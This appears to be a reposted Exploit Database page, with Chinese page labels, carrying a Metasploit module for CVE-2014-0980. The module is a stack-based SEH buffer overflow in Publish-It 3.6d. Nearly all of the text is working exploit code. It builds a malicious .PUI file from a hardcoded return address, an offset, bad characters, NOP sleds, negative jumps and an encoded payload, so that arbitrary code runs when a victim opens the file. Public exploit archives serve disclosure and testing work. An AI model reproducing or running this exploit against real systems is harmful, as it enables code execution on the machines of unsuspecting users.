Publish-It – ‘.PUI’ Local Buffer Overflow (SEH) (Metasploit)

• Exploit Database
• 136 阅读

• 作者： Metasploit
  日期： 2015-03-19
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/36437/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83

  ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking   include Msf::Exploit::FILEFORMAT   def initialize(info = {}) super(update_info(info, &apos;Name&apos;=> &apos;Publish-It PUI Buffer Overflow (SEH)&apos;, &apos;Description&apos;=> %q{ This module exploits a stack based buffer overflow in Publish-It when processing a specially crafted .PUI file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of Publish-It to open a malicious .PUI file. }, &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos;=> [ &apos;Daniel Kazimirow&apos;,# Original discovery &apos;Andrew Smith "jakx_"&apos;,# Exploit and MSF Module ], &apos;References&apos;=> [ [ &apos;OSVDB&apos;, &apos;102911&apos; ], [ &apos;CVE&apos;, &apos;2014-0980&apos; ], [ &apos;EDB&apos;, &apos;31461&apos; ] ], &apos;DefaultOptions&apos; => { &apos;ExitFunction&apos; => &apos;process&apos;, }, &apos;Platform&apos;=> &apos;win&apos;, &apos;Payload&apos;=> { &apos;BadChars&apos; => "\x00\x0b\x0a", &apos;DisableNops&apos; => true, &apos;Space&apos; => 377 }, &apos;Targets&apos;=> [ [ &apos;Publish-It 3.6d&apos;, { &apos;Ret&apos; =>0x0046e95a, #p/p/r | Publish.EXE &apos;Offset&apos;=>1082 } ], ], &apos;Privileged&apos;=> false, &apos;DisclosureDate&apos;=> &apos;Feb 5 2014&apos;, &apos;DefaultTarget&apos;=> 0))   register_options([OptString.new(&apos;FILENAME&apos;, [ true, &apos;The file name.&apos;, &apos;msf.pui&apos;]),], self.class)   end   def exploit   path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0980.pui") fd = File.open(path, "rb") template_data = fd.read(fd.stat.size) fd.close   buffer = template_data buffer << make_nops(700) buffer << payload.encoded buffer << make_nops(target[&apos;Offset&apos;]-payload.encoded.length-700-5) buffer << Rex::Arch::X86.jmp(&apos;$-399&apos;) #long negative jump -399 buffer << Rex::Arch::X86.jmp_short(&apos;$-24&apos;) #nseh negative jump buffer << make_nops(2) buffer << [target.ret].pack("V")   print_status("Creating &apos;#{datastore[&apos;FILENAME&apos;]}&apos; file ...") file_create(buffer)   end end